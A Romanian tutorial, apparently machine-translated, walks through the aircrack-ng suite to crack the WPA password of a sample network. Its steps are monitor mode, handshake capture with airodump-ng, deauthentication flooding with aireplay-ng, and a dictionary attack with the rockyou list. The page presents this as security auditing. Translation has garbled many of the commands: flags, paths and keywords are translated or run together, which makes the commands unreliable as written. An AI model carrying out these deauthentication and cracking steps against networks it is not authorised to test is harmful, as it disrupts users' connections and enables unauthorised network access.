Airmon-ng
Airmon-ng este utilizat pentru a gestiona modurile de card wireless și pentru a ucide procesele inutile în timp ce utilizați aircrack-ng. Pentru a detecta o conexiune wireless, trebuie să schimbați cardul wireless din modul gestionat în modul monitor și airmon-ng este utilizat în acest scop.
Airodump-ng
Airodump-ng este un sniffer fără fir care poate capta date fără fir de la unul sau mai multe puncte de acces fără fir. Este folosit pentru a analiza punctele de acces din apropiere și pentru a captura strângeri de mână.
Aireplay-ng
Aireplay-ng este utilizat pentru atacuri de reluare și ca injector de pachete. Poate fi de-autentificat utilizatorii de AP-urile lor pentru a capta strângeri de mână.
Airdecap-ng
Airdecap-ng este folosit pentru decriptarea pachetelor wireless WEP, WPA / WPA2 criptate cu cheie cunoscută.
Aircrack-ng
Aircrack-ng este folosit pentru a ataca protocoalele wireless WPA / WEP pentru a găsi cheia.
Aircrack-ng este ușor de instalat în Ubuntu folosind APT. Tastați următoarea comandă și aceasta va instala toate instrumentele disponibile în suita Aircrack-ng.
sudo apt-get updatesudo apt-get install -șiaircrack-ng
Utilizare
În acest articol, vom analiza rapid modul de utilizare a aircrack-ng pentru a sparge o rețea fără fir criptată (TR1CKST3R în acest exemplu) pentru a găsi parola.
În primul rând, enumerați toate cardurile wireless disponibile conectate la computerul dvs. utilizând comanda ‘iwconfig’.
Pentru acest tutorial vom folosi „wlxc83a35cb4546” numit card wireless (acest lucru poate fi diferit în cazul dvs.). Acum, ucideți toate procesele care rulează pe cardul wireless folosind airmon-ng.
[e-mail protejat]: ~ $sudoverificare airmon-ngucidePorniți modul Monitor pe „wlxc83a35cb4546” tastând
[e-mail protejat]: ~ $sudoairmon-ng start wlxc83a35cb4546
Acum, airmon-ng a început modul Monitor pe cardul wireless, va apărea sub numele diferit „wlan0mon”. Rulați din nou „iwconfig” pentru a lista detaliile wireless.
Apoi, utilizați airodump-ng pentru a vedea punctele de acces wireless din apropiere și proprietățile acestora.
[e-mail protejat]: ~ $sudoairodump-ng wlan0mon
Puteți restrânge căutarea utilizând filtrele MAC (–bssid) și canal (-c). Pentru a captura strângerea de mână (strângerea de mână conține o parolă criptată), trebuie să ne salvăm pachetele undeva folosind opțiunea –write. Tip,
[e-mail protejat]: ~ $sudoairodump-ng--bss6C: B7:49: FC:62: E4-c unsprezecewlan0mon--scrie /tmp/strângere de mână.cap
--bss: Adresa MAC a punctului de acces
-c: Canalul punctului de acces[1-13]
--scrie: Stochează pachetele capturate într-o locație definită
Acum, trebuie să ne autentificăm fiecare dispozitiv din acest punct de acces folosind utilitarul Aireplay-ng. Scrie
[e-mail protejat]: ~ $sudoaireplay-ng-0 100 -la [MAC_ADD]wlan0mon
-a: Specificați punctele de acces MAC pentru Aireplay-ng
-0: Specificați numărul de pachete deauth de trimis
După un timp, toate dispozitivele vor fi deconectate de la acel punct de acces, când vor încerca să se reconecteze, rularea airodump-ng va captura strângerea de mână. Va apărea în partea de sus a funcției airodump-ng.
Strângerea de mână este stocată în directorul „/ tmp /” și conține o parolă criptată care poate fi forțată brute offline folosind un dicționar. Pentru a sparge parola, vom folosi Aircrack-ng. Tip
[e-mail protejat]: ~ $sudoaircrack-ng/tmp/strângere de mână.cap-01.cap-în/usr/acțiune/liste de cuvinte/rockyou.txt
-în: Specificați locația dicționarului
Aircrack-ng va parcurge lista de parole și, dacă va fi găsită, va afișa parola utilizată ca cheie.
În acest caz, aircrack-ng a găsit parola folosită „123456789”.
Acum, opriți modul Monitor pe cardul wireless și reporniți administratorul de rețea.
[e-mail protejat]: ~ $sudoairmon-ng stop wlan0mon[e-mail protejat]: ~ $sudoreporniți managerul de rețea al serviciului
Concluzie
Aircrack-ng poate fi utilizat pentru a audita securitatea wireless sau pentru a sparge parolele uitate. Există alte instrumente similare disponibile în acest scop, cum ar fi Kismet, dar aircrack-ng este mai bine cunoscut pentru un suport bun, versatilitate și o gamă largă de instrumente. Are o interfață de linie de comandă ușor de utilizat, care poate fi ușor automatizată folosind orice limbaj de scriptare, cum ar fi Python.